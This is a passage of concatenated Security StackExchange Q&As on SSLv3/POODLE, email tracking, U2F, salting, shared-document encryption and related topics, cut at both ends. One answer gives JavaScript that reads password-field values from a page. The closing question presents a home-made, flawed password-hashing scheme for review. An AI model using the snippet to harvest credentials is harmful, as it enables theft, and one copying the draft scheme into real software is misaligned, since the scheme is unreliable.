3073927320:error:1409E0E5:SSL routines:SSL3_WRITE_BYTES:ssl handshake failure:s3_pkt.c:596: meaning SSLv3 is disabled on the server. Otherwise the connection will established successfully. Nmap Alternatively, you can use nmap to scan server for supported version: # nmap --script ssl-enum-ciphers example.com
Starting Nmap 6.47 ( http://nmap.org ) at 2014-10-15 03:19 PDT
Nmap scan report for example.com (203.0.113.100)
Host is up (0.090s latency).
rDNS record for 203.0.113.100: edge.example.com
Not shown: 997 filtered ports
PORT STATE SERVICE
80/tcp open http
443/tcp open https
| ssl-enum-ciphers:
| **SSLv3: No supported ciphers found**
| TLSv1.0: | {
"source": [
"https://security.stackexchange.com/questions/70756",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/396/"
]
} |
70,786 | This app claims to know when recipients opened the emails that were sent to them. Tracking clicked URLs is fairly straightforward. What I don't understand is how a 3rd party can possibly know when I open their email? Does web-based email clients automatically provide reading-proof to all emails? Because I remember Outlook was asking me whether I wanted to actually send proof of reading or not. If so, how do I disable it? | They track opens the same way every other email sending/analytics company does it: by inserting a tracking pixel within the HTML of the email. If your email client blocks image loading by default, then you won't be tracked. If you load the images, or your client automatically downloads the images (iPhone email client) then you're being tracked. You can see more information about how this works precisely here: http://en.wikipedia.org/wiki/Web_bug | {
"source": [
"https://security.stackexchange.com/questions/70786",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/58740/"
]
} |
70,832 | While disabling SSLv3 from our ssl.conf files to overcome the Poodle vulnerability, I also disabled the SSLv3 ciphers using !SSLv3 . With the ciphers disabled, we were not able to access the website through Firefox and IE. The following was the error message from Firefox: An error occurred during a connection to xxxx.example.com.
Cannot communicate securely with peer: no common encryption algorithm(s).
(Error code: ssl_error_no_cypher_overlap) So we went back and enabled the SSLv3 ciphersuite and it all started working fine. Right now, the SSLv3 protocol is disabled, but the SSLv3 ciphers are enabled. Am I assuming correctly that we got the error with one of the browsers because TLS ciphers were not available in the browser? Is it possible that the protocol used is TLSv3, but the ciphers are of SSLv3? SSLProtocol all -SSLv2 -SSLv3
#SSLProtocol -all +SSLv3
# SSL Cipher Suite:
# List the ciphers that the client is permitted to negotiate.
# See the mod_ssl documentation for a complete list.
SSLCipherSuite ALL:!ADH:!EXPORT:!SSLv2:RC4+RSA:+HIGH:!MEDIUM:!LOW We can upgrade the browsers at our office, but can't do that on our customer's machines. Is having SSLv3 protocol disabled, but with the ciphers enabled a recommended setup? In other words, are we okay with connecting through TLS with SSLv3 ciphers? | I presume from your ssl.conf setting that you are using the mod_ssl module from Apache web server. This module relies on OpenSSL to provide the cryptography engine. From the documentation on OpenSSL , it states: Protocol version: SSLv2, SSLv3, TLSv1.2. The TLSv1.0 ciphers are
flagged with SSLv3 . No new ciphers were added by TLSv1.1 You can confirm the above by running the following command: $ openssl ciphers -v 'TLSv1' | sort
ADH-AES128-SHA SSLv3 Kx=DH Au=None Enc=AES(128) Mac=SHA1
ADH-AES256-SHA SSLv3 Kx=DH Au=None Enc=AES(256) Mac=SHA1
ADH-CAMELLIA128-SHA SSLv3 Kx=DH Au=None Enc=Camellia(128) Mac=SHA1
ADH-CAMELLIA256-SHA SSLv3 Kx=DH Au=None Enc=Camellia(256) Mac=SHA1
... This means that if your configuration file excludes ciphersuite SSLv3, you are effectively removing support for TLSv1.0 too! That leaves you with ciphersuite TLSv1.2 only since support for SSLv2 has also been removed: $ openssl ciphers -v 'ALL:!ADH:!EXPORT:!SSLv2:RC4+RSA:+HIGH:!MEDIUM:!LOW:!SSLv3' | sort
AES128-GCM-SHA256 TLSv1.2 Kx=RSA Au=RSA Enc=AESGCM(128) Mac=AEAD
AES128-SHA256 TLSv1.2 Kx=RSA Au=RSA Enc=AES(128) Mac=SHA256
AES256-GCM-SHA384 TLSv1.2 Kx=RSA Au=RSA Enc=AESGCM(256) Mac=AEAD
AES256-SHA256 TLSv1.2 Kx=RSA Au=RSA Enc=AES(256) Mac=SHA256
... From the above, it is not hard to see why you should NOT remove SSLv3 from the ciphersuite. Disabling SSLv3 protocol is more than sufficient to protect your clients from POODLE vulnerability. The error message you are experiencing is likely because you are using older browsers such as Firefox < 27.0 or Internet Explorer < 11.0 as these versions do not support TLSv1.2 by default. | {
"source": [
"https://security.stackexchange.com/questions/70832",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/58761/"
]
} |
70,846 | What is the easiest way for two people – neither of whom are computer specialists and cannot meet in person – to send a password for an encrypted file that is attached to an email? The two simplest methods are these: telephone the other person and read the password over the phone; or write in the email questions that the NSA and other hackers couldn’t possible answer. The answers or parts thereof when compiled can then be the password or hashed to provide a password. Asking non-technically minded people to install full PGP to send a password is not realistic. Is there a simple piece of JavaScript out there that can do a Diffie-Hellman, so the resulting shared key can become the password? | I too have tried to come up with a good solution for this. But I found https://onetimesecret.com/ which works great. Basically you create a link containing a password and you send this link to the intended recipient. As soon as the receiver clicks on the link, the link expires and the password is deleted. So the receiver only has one time to copy the password. A one-time secret. | {
"source": [
"https://security.stackexchange.com/questions/70846",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/57283/"
]
} |
70,866 | Using Ctrl + ← / → , it's a common behavior across different operating systems to jump from word to word (or from blank to blank) in text input fields. Now I've discovered that this also applies on password fields in Internet Explorer 8 and 11 (I haven't tried it on other versions yet): the actual text is masked with bullet points, nevertheless I'm able to find blanks using the mentioned keyboard combination. At least in Chrome 38, the combination only jumps between the beginning and the end of the whole text. Why isn't this fixed in Internet Explorer? Can this be considered as a security risk? It's only relevant if the password is stored; I guess, this opens more serious attack vectors using external tools, like reading the password from the password store, or using unmasking tools. Still, doing the word jumping, it's possible to get a quick idea of the password using Internet Explorer's built-in "features" Is it possible to change the word delimiter (a whitespace?) at runtime? So could I change it to 'a', and jump to every 'a' using the arrow keys? As mentioned in the comments, it's also possible to jump to special characters like $ , although here the cursor would stop both before and after the character. Is the exact "jumping algorithm" documented anywhere? Are there any other problems with the described behavior of Internet Explorer? | No that is not a security risk. Having stored passwords in a browser is a security risk. Letting an attacker access your computer between when you've typed in the password and before it is submitted is a security risk (and even after you've submitted it, you need to worry about theft of valid session cookies). Being able to jump to blanks/special characters in a typed in password is not a risk. After a password has been typed in the password field, its in the browsers DOM and only takes the least bit of effort to extract the full value out from it. E.g., if you go to the developer's javascript console (e.g., in chrome/linux type Ctrl-Shift-J) and type in (you can skip the comment lines that begin with // ): var inputs = document.getElementsByTagName('input');
// find all <input> elements in the page
for ( var i = 0; i < inputs.length; i++) {
// loop through all <input> elements
if (inputs[i].getAttribute('type') === 'password') {
// find input elements with attribute type="password"
console.log(inputs[i].value);
// print the values of these password elements to the screen.
}
} It will print to the screen whatever text is typed into any password fields. (This code is equivalent to the jQuery $('input[type=password]').value , which will work if the webpage has loaded jQuery). You could just type the word javascript: in the location bar and then paste var inputs=document.getElementsByTagName('input'); for( var i=0; i < inputs.length; i++ ) { if (inputs[i].getAttribute('type') === 'password') alert(inputs[i].value) } into the location bar and whatever text is in any password field will be alerted to you. (Note most browsers will remove the javascript: part if you try to paste the full URL, so you will have to type it. javascript:var inputs=document.getElementsByTagName('input'); for( var i=0; i < inputs.length; i++ ) { if (inputs[i].getAttribute('type') === 'password') alert(inputs[i].value) } | {
"source": [
"https://security.stackexchange.com/questions/70866",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/44774/"
]
} |
71,171 | There are now tons of Certification Authorities (CAs) that are trusted by default in major OS's, many of which are unrecognizable without online lookup or reference. While there have been attempts by the NSA and others to "hack" or otherwise exploit root certicate authorities; is there anything preventing the NSA from becoming a Root CA itself? It certainly has the resources and expertise, and could "suggest" to major OS vendors to add its Root CA to the default trust store list (which is large enough that it may not be noticed by anyone..?) If it is feasible, what would the implications be? Could they essentially Man-in-the-Middle attack most HTTPS connections without a warning? (Perhaps not Dragnet-type interception, but close?) Or create a fake commercial root CA as obviously people would be suspicious if it had NSA plastered all over it? | It is already done: It is the FPKI root CA, under explicit and full control of the US government. Windows already trusts it by default. Before you flip out and begin to delete root CA certificates, burn your computer's motherboard, or drink a gallon of vodka, think about what it means. It means that the US government could technically emit a fake certificate for any SSL site that you are browsing -- but with a certificate chain that would point back to the US government. That is the point of having a "trusted CA" in the client: so that the client may validate a certificate chain. Therefore, such a forged site would hardly be a discreet way to eavesdrop on communications. All it would take would be a single user clicking on the padlock icon, reviewing the certificate chain, notice the FPKI root, and mock Obama on Twitter. Pushing your own root CA in the "trusted store" of your victims is not an adequate way to spy on people without them noticing . Although it is a government agency, the NSA as a whole is usually not that stupid. | {
"source": [
"https://security.stackexchange.com/questions/71171",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/52102/"
]
} |
71,187 | How do you create a readable password using bash with one line? What if i'm looking for 128 bits of entropy? EDIT By readable I mean the 94 printable ascii characters (without space) . It can use less than these characters as long as it has at least 128 bits of entropy. | It depends on what you mean by "readable". If you want to use only hexadecimal characters, you will need 32 of them to reach 128 bits of entropy; this line will work (using only commands from the coreutils package): head -c16 /dev/urandom | md5sum This variant produces passwords with only lowercase letters, from 'a' to 'p' (this is what you will want if you have to "type" the password on a smartphone): head -c16 /dev/urandom | md5sum | tr 0-9 g-p If you want to type one less characters, try this: head -16 /dev/urandom | md5sum (Probability of getting all first 16 random bytes as 0x0A, i.e. the "newline" character, is 2 -128 , hence this line still gets 128 bits of entropy.) Still limiting yourself to commands from coreutils , you can do this: mktemp -u XXXXXXXXXXXXXXXXXXXXXX This one generates a 22-character password, using /dev/urandom as internal source of randomness (I checked in the source code, and a strace call confirms). The characters are letters (uppercase and lowercase) and digits; since 62 22 is greater than 2 128 , the 22 characters are sufficient. Yet another one: od -An -x /dev/urandom | head -1 this displays eight sequences of four hexadecimal digits. Arguably, this split into small sequences may help reading. For a much longer line and a quite distinct kind of password, try this: for i in {1..8} ; do head -$(expr $(head -c7 /dev/urandom | od -An -t dL) % $(wc -l < /usr/share/dict/british-english)) /usr/share/dict/british-english | tail -1 ; done (this one works only on a 64-bit host; will you notice why ?). Apart from coreutils , that version also requires a dictionary file, here the one for British English. | {
"source": [
"https://security.stackexchange.com/questions/71187",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/58920/"
]
} |
71,199 | I'm a bit confused on the differences between Signature Algorithm , Signature Hash Algorithm , and Thumbprint Algorithm that are present in SSL/TLS certificates. Can someone please elaborate? | You are confused because some people (yeah I am looking at you, Microsoft) have been using the terms inconsistently. A signature algorithm is a cryptographic algorithm such that: The signer owns a public/private key pair . The public key is public, the private key is private; even though both keys are mathematically linked together, it is not feasible to recompute the private key from the public key (which is why the public key could safely be made public). On a given input message, the signer can use his private key to compute a signature , which is specific to both the signer's key pair, and the input message. There is a verification algorithm that takes as input the message, the signature and the public key, and answers "true" (they match) or "false" (they don't). The cornerstone of signature security is that it should not be feasible, without knowledge of the private key, to generate pairs message+signature that the verification algorithm will accept. You may encounter some "explanations" that try to say that digital signatures are some kind of encryption; they usually describe it as "you encrypt with the private key". Don't believe it; these explanations are actually wrong, and confusing. For technical reasons, signature algorithms (both for signing and for verifying) often begin with a hash function . A hash function is a completely public algorithm with no key. The point of hash functions is that they can eat up terabytes of data, and produce a "digest" (also called "fingerprint" or even "thumbprint") that has a fixed, small size. Signature algorithms need that, because they work with values in some algebraic structure of a finite size, and thus cannot accommodate huge messages. Therefore, the message is first hashed, and only the hash value is used for generating or verifying a signature. That hash algorithm, when it is used as first step of a signature generation or verification algorithm, will be called "signature hash algorithm". When we say something like "RSA/SHA-256", we mean "RSA signature, with SHA-256 as accompanying hash function". A "thumbprint algorithm" is another name for a hash function. It is often encountered when talking about certificates : the "thumbprint" of a certificate really is the result of a hash function applied to the certificate itself (in Windows systems, the SHA-1 hash function is used). | {
"source": [
"https://security.stackexchange.com/questions/71199",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/2075/"
]
} |
71,273 | On occasion, I hear the terms "key length" and "bit strength" used interchangeably. Are these the same things? Or are they different? | I'd use bit length for the size of something, such as a key. I'd use bit strength as the base 2 logarithm of the cost of an attack. i.e. it costs about 2^n basic operations to break something. A brute force attack against an n bit key that simply tries to guess the key costs 2^(n-1) calls to the encryption function on average, which lead to this convention of expressing the strength of an algorithm in bits. Thus you could understand "n bit strength" as "Breaking this costs approximately as much as breaking a symmetric encryption algorithm with an n bit key." But they differ in other cases. A few examples: An RSA key with a length 2048 bits only has a strength of about 112 bits. A hash with length 128 bits can only have 64 bits of collision resistance. 3DES takes a 168 bit key, but only offers 112 bits of security, due to a meet-in-the-middle attack. | {
"source": [
"https://security.stackexchange.com/questions/71273",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/2075/"
]
} |
71,316 | Google and Yubico just announced the availability of cryptographic security tokens following the FIDO U2F specification. Is this just another 2FA option, or is this significantly better than solutions such as SecureID and TOTP? Specifically: In what way is U2F fundamentally different from OTP? How does U2F affect the feasibility of phishing attacks in comparison to OTP systems? How feasible are non-interactive attacks against U2F (e.g. brute-force, etc)? Can I safely use a single U2F token with multiple independent services? How does U2F stack up against other commercial offerings? Are there better solutions available? | The answers I've gotten have been good, but I wanted to provide a bit more depth, going specifically in to why the system exists at all, which should explain a bit more about what it's good for. Disclaimer: While I now work for Google, I knew nothing about this project at the time this answer was written. Everything reported here was gathered from public sources. This post is my own opinions and observations and commentary, and does not represent the opinions, views, or intentions of Google. Though it's worth pointing out that I've been using this and tinkering with it for quite some time now, and as someone who has dealt a lot with social engineering and account takeovers, I am disproportionately impressed with what has been accomplished here. Why something new was needed Think about this: Google deployed two-factor authentication a long time ago. This is a company that cares deeply about security, and theirs has been top notch. And while they were already using the best technology available, the additional security that U2F delivers above traditional 2-factor is so significant that it was worth the company's time and money to design, develop, deploy, and support a replacement system that they don't even themselves sell. Yes, it's a very socially-conscious move of them to go down this road, but it's not only about the community. Google also did it because they, themselves, need the security that U2F alone provides. A lot of people trust Google with their most precious information, and some in dangerous political environments even trust Google with their lives . Google needs the security to be able to deliver on that trust. It comes down to phishing. Phishing is a big deal. It's extremely common and super effective . For attacks against hardened targets, phishing and similar attacks are really an attacker's best bet, and they know it. And more importantly: Our phishing protection is laughable. We have two-factor auth, but the implementations offer little defense. Common systems such as SecurID, Google Authenticator, email, phone, and SMS loops -- all of these systems offer no protection at all against time-of-use phishing attacks. A one-time-password is still a password, and it can be disclosed to an attacker. And this isn't just theoretical. We've seen these attacks actually carried out. Attackers do, in fact, capture second-factor responses sent to phishing sites and immediately play them on the real login page. This actually happens, right now. So say you're Google. You've deployed the best protections available and you can see that they're not sufficient. What do you do? Nobody else is solving this problem for you; you've got to figure it out. The solution is easy; Adoption is the real issue Creating a second-factor solution that can't be phished is surprisingly simple. All you have to do is involve the browser. In the case of U2F, the device creates a public/private key pair for each site and burns the site's identity into the "Key Handle" that the site is supposed to use to request authentication. Then, that site identity is verified by the browser each time before any authentication is attempted. The site identity can even be tied to a specific TLS public key. And since it's a challenge-response protocol, replay is not possible either. And if the server accidentally leaks your "Key Handle" in a database breach, it still doesn't affect your security or reveal your identity. Employing this device effectively eliminates phishing as a possibility , which is a big deal to a security-sensitive organization. Neither the crypto nor its application is new. Both are well-understood and trusted. The technology was never the difficulty, the difficulty is adoption. But Google is one of only a small number of players in a position to overcome the barriers that typically hold solutions like this back. Since Google makes the most popular browser, they can make sure that it's compatible by default. Since they make the most popular mobile OS, they can make sure that it works as well. And since they run the most popular email service, they can make sure that this technology has a relevant use case. More Open than Necessary Of course Google could have leveraged that position to give themselves a competitive advantage in the market, but they didn't. And that's pretty cool. Everyone needs this level of protection , including Yahoo and Microsoft with their competing email offerings. What's cool is that it was designed so that even competitors can safely make it their own. Nothing about the technology is tied to Google -- even the hardware is completely usage-agnostic. The system was designed with the assumption that you wouldn't use it just for Google. A key feature of the protocol is that at no point does the token ever identify itself . In fact the specifications state that this design was chosen to prevent the possibility of creating a "supercookie" that could be used to track you between colluding services. So you can get a single token and safely use it not only on Gmail, but also on any other service that supports U2F. This gives you a lot more reason to put down the money for one. And since Yubico published reference implementations of the server software in PHP, Java, and Python, getting authentication up and running on your own server is safely within the reach of even small shops. | {
"source": [
"https://security.stackexchange.com/questions/71316",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/2264/"
]
} |
71,372 | When users register on my site, I want to store their username and hashed password in my database. When I hash that password, I'm going to salt it using PHP. The issue is, I don't want to store the salt in a database that could be compromised - that defeats the purpose of salting, doesn't it? Instead, I want to have a unique salt per user that is stored on a separate server - say, a cloud platform? Is this safe/the right way to go? | It is not a problem if the attacker learns the salts. Salts are not meant to be secret. What is important for a salt is that it is unique for each hashed password instance (i.e. not only a unique salt per user, but the user's salt must be changed when the user changes his password). If you think of your salt as something that may be shared between passwords, but must not be known to the attacker, then that is not a salt; that's a key . Some people call such keys "pepper" in the case of password hashing. This is a concept quite distinct from salts, and, generally speaking, it adds complexity and increases failure frequency without really improving security. Get the basics right first (i.e. using the right function with proper salts). The normal method is to store the salt along with the hash value. Preferably, you let the password hashing library generate the salt and handle the encoding of the salt and hash value as a single string. So you make sure that you use PHP 5.5 (or newer), and you use password_hash() (and don't use the manual salt setting; the library does the right thing by default, so just let it do it). Among possible password hashing functions , bcrypt is about the best you can have right now, and that's what password_hash() will use. | {
"source": [
"https://security.stackexchange.com/questions/71372",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/59222/"
]
} |
71,474 | It seems like there are lots of ways to prevent man in the middle attacks. I've read many on here and on the rest of the internet. According to wiki you need a secure channel as well to completely safeguard against it. I have two questions in regards to preventing it in the real world. Does the US government monitor 100% of the lines dug in the US? Obviously (hopefully) data centers are secured but what is there to stop someone from driving out into the desert and physically tapping into a line? In that scenario, is there anything that can be done by two nodes to detect someone started eaves dropping? (Maybe more of a physics question?) Are there any protocols like this already? This question is in the scope of public key cryptography because if you have a secure channel you can just exchange a new key as needed. | Physical surveillance of millions of miles of buried cables would be preposterously expensive. The US government already fails at efficiently preventing illegal immigration across the Mexican/USA boundary, which is one or two orders of magnitude shorter than the total length of cables. Instead, US government does things like everybody else: with encryption (or so we hope, at least). A good encrypted tunnel (e.g. SSL) keeps attackers at bay. Encryption ensures confidentiality. A good tunnel also provides data integrity, in the following sense: alterations are reliably detected. However, if an attacker uses a shovel to get to the cable, he can cut it (it has happened ). To make communications more resilient, one must use redundancy; see this answer (when the attacker wields nuclear weapons, you have to think big in terms of redundancy). | {
"source": [
"https://security.stackexchange.com/questions/71474",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/40048/"
]
} |
71,540 | I run a website at https://fastslots.co . I just discovered that I am getting requests from the URL https://canadaehtees.com/ that I have no affiliation with. When I load canadaehtees.com in my browser I get a warning about an invalid SSL certificate. If I proceed anyway, the site that is displayed looks and behaves exactly like fastslots.co and all requests made there go to my server. However, the URL stays at canadaehtees.com. My site is written in Node.js , and I am not using a proxy. I am redirecting all requests that use HTTP or that start with www to my site using HTTPS. I am not sure what the best thing to do is. Obviously I can just return an error page if I get a request where the URL does not match fastslots.co. Still I am worried about what is going on here. Does anyone know? [ Edit : I am now redirecting all requests to fastslots.co that have an unknown host (such as canadaehtees.com for example). Is this not a good idea?] | I've taken a quick look, and this appears to be completely benign, if somewhat annoying. It's not an attack as Michael suggested in his answer. What has happened is that someone purchased a domain (canadaehtees.com) and pointed the DNS records for that domain at the IP address that currently hosts your website (fastslots.co). Why? It could be a simple mistake, or it could be that they were in possession of that IP address before you were, given that their domain name is slightly older than yours. This is why the site at that domain looks exactly like yours (it is yours!) and you get the invalid certificate error over https (because the certificate is also yours, and so isn't for canadaehtees.com, but for fastslots.co.) What can you do about? Well, redirecting as you've currently configured is one option. I would suggest that you change the redirect from a 302 (temporary) to a 301 (permanent) if this is the solution you want to use long term. Other status codes you could return for unknown hosts would be 404 (not found) or 410 (gone). The more drastic solution, but the one that should permanently fix the issue without any further work on your part would be move your site to another IP. | {
"source": [
"https://security.stackexchange.com/questions/71540",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/59436/"
]
} |
71,761 | When you have a password stored in a database that has been strongly hashed and salted does it really matter if the underlying user password is weak? If you setup features like limiting login guessing and use captchas to stop automated guessing can you effectively make up for a weak password such as " password "? I guess my question is does using a password like "password" make the salted hash any weaker than using a longer password such as " fish&*n0d1cTionaRYatt@ck "? - Are all salted hashes equally as secure or does it depend upon the password being a good one? | Salted hashes are designed to protect against attackers being able to attack multiple hashes simultaneously or build rainbow tables of pre-calculated hash values. That is all. They do nothing to improve the underlying strength of the password itself, weak or strong. This also means that they're not designed to defend against online attacks, so they have no impact on an attackers ability to manipulate your login form, where the salt is irrelevant, because an attacker isn't computing hashes directly, but entering candidate passwords into a form that may be (as you said) rate limited or protected by a captcha. Weak passwords are weak. Strong passwords are strong. Salts don't affect this equation in any way. | {
"source": [
"https://security.stackexchange.com/questions/71761",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/43059/"
]
} |
71,905 | I just discovered that my university alumni's login page is just plain HTTP. Wireshark confirmed that the credentials are sent using an HTTP POST message. I did a bit of research and, as I thought, HTTPS should always be used on the login page (See Is it secure for a site to serve the login page with HTTP, but have the actual site in HTTPS? ). First of all, I'd like to do my university a favour, but how can I make them to take some actions? It's highly probable that my personal data, such as degree and year graduated, is store on the alumni database. It's not surprising that some organizations don't take such a report seriously (See How do I report a vulnerability to a large organization that doesn't believe it has a problem? ). I've emailed the university's IT helpdesk using my alumni email account, but the personnel asked me to direct my inquiry to a general alumni inquiry email. On top of the technical details, how can I make sure that no police will arrest me for hacking? I have not attempted to steal any personal information. I am not interested to report this vulnerability to some security forum before the university takes some action. P.S. I'm embarrassed that my CS degree was from that school. | Simply reporting that it is using HTTP rather than HTTPS for login and that that is insecure shouldn't get you accused of hacking. It is something immediately publicly visible from looking at the site. There are many ways of detecting vulnerabilities which could actually be considered hacking (for example, running a vulnerability scanner against a target you aren't authorized to run it against), but I'm not aware of any jurisdictions that would consider looking at the page and recognizing a flaw that is immediately visible to be hacking. It would be a bit like walking by a house, noticing that someone was leaving their door open when they were leaving and being accused of being a thief when you pointed out to them they left the door open (while you aren't even standing on their property.) | {
"source": [
"https://security.stackexchange.com/questions/71905",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/-1/"
]
} |
71,911 | Current setup We have a service that allows users to upload documents through a website and stores the uploaded documents encrypted on disk. The documents on disk are encrypted with a per-user key, which is randomly generated upon account creation. This document key is stored in a database field which is encrypted with the user's password as the key.
When the user (owner) want to download a document, they need to provide their password, which is used to decrypt the document key which is in turn used to decrypt the document. We have chosen this pattern to negate the need to re-encrypt all encrypted documents when the user chooses to change their password: we only need to re-encrypt the document key. This setup work fine (and we think it is a secure pattern 1 ). Required changes Unfortunately, we have two new requirements to implement. By law, we are required to be able to decrypt any documents we have on disk, upon request by the government; Someone has decided that the owner of a document should be able to share the uploaded document with other users. I don't know how to implement those requirements while keeping the documents stored with per-user encryption. So, my question is: Is there a known pattern that allows for encrypting documents so that they can be decrypted by one or more parties, where the parties in question are to be determined upon document encryption? Update : Some background information on the law mentioned above: In fact, the law does not state that we are required to build in a back door. The law makes it a criminal offence to not hand over the key to any encrypted data you have 2 if the police requests the key 3 . A result of this is that we who host the data need to have a back door, or face prosecution in case we cannot decrypt the data when requested. However, other than in some other countries, we are free to communicate the fact that we received an order to decrypt documents. These laws are unfortunately not uncommon . Informing our customers and the public: As I indicated in a comment before, I fully intend to pull my weight to makes sure this policy is clearly communicated to our customers. Privacy statements need be changed and TOS need to be updated. Public awareness on the one hand and making sure 'bad laws cost money' on the other, are the best method I have available to protest against such laws. However, at the same time I'm kinda sceptical about the impact of such statement. Most people simply don't care. At the same time, many people use their email and inbox to store and share documents. So from that perspective our service is (still) a huge improvement (and it is the reason some of our customers require their employees to use it). 1. If there is a glaring hole in this method, feel free to comment on it. 2. Lawyers have figured that 'data you have' is meant to include all data stored on physical devices you own (I'm not a lawyer, so this my lay-persons translation of what they concluded). 3. Yes, not some fancy security office, but police. There are some safeguards in when they can request password, but that doesn't change the implications of this law. The big question is what happens when you truly forgot the password to some data. The minister has indicated that it is the responsibility of the owner of such encrypted data to then delete it. But no such case has yet (as to my knowledge) been tried in court. | You need a per-document key, not a per-user key. Well, you also need per-user keys, but that is another matter. Namely, each document D is encrypted with a key K D . That key is generated randomly the first time the document is imported in the system. Each document has its own key. The key for a document cannot be inferred from the key on any other document. Each user U also has a key K U . Therefore, if you need document D to be accessible to users U , V and W , then you store E K D (D) (encryption of D with the document key), along with E K U (K D ) , E K V (K D ) and E K W (K D ) (encryption of key K D with the keys of user U , V and W ). These "encrypted keys" have a small size (a few dozen bytes, regardless of the document size) so this scales up. To make things more practical, you may need to use asymmetric encryption for user keys: encryption of D uses a convenient symmetric system (say, AES), but the "user keys" will be of type RSA (or another similar algorithm like ElGamal). That way, if user U wants to share the document D with user V , then he: retrieves E K U (K D ) from the server; uses his own private key to decrypt that and recover K D ; encrypts K D with V 's public key , yielding E K V (K D ) . The beauty of this scheme is that V needs not be present for this procedure, since only V 's public key is used. At that point, what you really have is OpenPGP , a format meant primarily for secure emails. Emails have this "sharing property" (an email may be sent to several recipient) and are asynchronous (when you send the email, the recipient is not necessarily available right away). You would be well advised to reuse OpenPGP, a format that has been reviewed by many cryptographers, and for which implementations already exist. When you have a sharing mechanism, you can simply put yourself as implicit recipient for every document, and you can read everything. Regardless of law requirements, be sure to notify users through the "usage conditions" that you can technically read everything; otherwise they may sue you for lack of warning. | {
"source": [
"https://security.stackexchange.com/questions/71911",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/53887/"
]
} |
71,934 | This is going to get long, so prepare. Basis of the question is, Do all these steps improve security, or am I completely overthinking the problem? Are my assumptions/thought process valid? We all know there are many types of attacks a hacker can use to infiltrate a system, however, this deals with password hashing, so I am going to ignore other attacks
like injections, etc. As far as I'm aware, there are 2 types of attacks that good password hashing can help prevent: offline brute-force attack and offline rainbow table attacks.
In order to perform these, however, the attacker must first obtain access to the user-password file, where the passwords are stored as hashed versions, not plain text. A brute
force attack involves guessing the user's password many, many, many times until the password he guessed matches the hashed password in the file. If you hash chain, the attacker
must keep guessing down the chain, checking against the hashed version at that level until he arrives at the original password. Ranbow attacks are similar, but instead of guessing,
the attacker uses a lookup table of pre-computed hashes based on commonly used passwords, words, and common variations. Rainbow attacks can be thwarted by using uncommon passwords
or salts (password prefixes) which would not be contained in a pre-computed table. Instead, the attacker would have to compute this table on the fly which takes much, much longer.
We can never prevent the attacker from guessing the password and checking to see if it is correct, but we can make it harder on him by making him guess many more times. We do this
by chaining hashes so that whenever the attacker cracks the i'th hash, he must then repeat the process for the (i-1)th hash. However, if the attacker knows how many times we hash
the password, this is mostly moot (see NOTE2). Anyway, on to the code: function createHashedPassword(char[] username, char[] userPassword)
{
char[] secretCompanyString = "Some Secret Company String Only Visible via Source Code";
char[] companySalt = hash_sha512(secretCompanyString+username); //NOTE1
memset(secretCompanyString[0], 0, sizeof(secretCompanyString)); //remove secretCompanyString from memory
char[] userSalt = salt_generator_512();
char[] hashedPassword = userSalt + hash_sha512(companySalt+userSalt+userPassword);
memset(userPassword[0], 0, sizeof(userPassword)); //remove userPassword from memory
int NumIterations = 4242+userPassword.length; //DOES MAKING THIS NUMBER PRIVATE/PASSWORD-DEPENDANT ENHANCE SECURITY? SEE NOTE2
for(i=1;i<NumIterations;i++) //NOTE3
{
userSalt = salt_generator_512() + userSalt; //SHOULD I BE USING A NEW SALT EACH TIME? SEE NOTE4
hashedPassword=userSalt+"$"+hash_sha512(companySalt+userSalt+hashedPassword);
}
numIterations=0; //Remove number of iterations from memory
memset(companySalt[0], 0, sizeof(companySalt)); //remove companySalt from memory
return "$6$"+hashedPassword;
} Note1: I believe that this is better than companySalt=secretCompanyString , because if a user can brute force his way into the top level of the chain (i.e. finding that companySalt+userSalt+hashedPassword leads to hashedPassword ), he would see that it was in the form of companySalt+userSalt+hashedPassword , and
the companySalt would no longer be secret. However, being user dependant, he would not be able to use it to help crack other passwords. He could then attempt to brute force
his way into figuring out that the companySalt => secretCompanyString+username , but that would involve yet another (long) brute-force attack. NOTE2: I believe making the number of iterations private would help a great deal because if the attacker knew how many times, all he would need to do is guess a password, hash it
N times, and then check the result against the hash, instead of having to crack the umpteenth hash, and then have to work his way down the chain until he arrives at the password.
If this value was public, I don't believe it would be any more secure to hash chain than it would be to only hash the password once. Am I right in thinking this? In terms of the
second point, making the number of iterations password dependent should enhance security against brute-force attacks. Assume a user of the site gains access to
the password file. He knows his username, password, and public salt. He can then brute force his way into getting the companySalt and number of iterations (assuming he knows
that we use a company salt and chain hashing scheme). With that information, it would be easier , but still not easy, to then brute-force his way into another user's
account. However, if the companySalt and/or number of iterations changes from user to user, this information would gain him nothing. Making it private/user dependant, I believe,
should help prevent brute force attacks, not rainbow table attacks. This leads me into NOTE3. NOTE3: I know we are supposed to hash chain, but why does this increase security? To slow down brute-force attacks by a factor of N? I'd assume it would also make using
Rainbow tables infeasible because the rainbow table would have to contain all N entries, which would be practically impossible / impractically large. NOTE4: After the attacker figures out we are using a company salt and brute forces his way into his first level, he would have built a huge table with guesses in the form of "companySalt+userSalt+XXXXXXX" . If we used the same salt over and over, there is a possibility (however small) that in the process of guessing one link in the chain, he
he already calculated a hash for another level. When he gets to that level, he can simply use his lookup table. But by pre-appending a new salt to the old salt each time,
it breaks that pattern and makes it impossible for him to have already guessed that hash. He will have to start building the table from scratch. I am pre-appending here so that
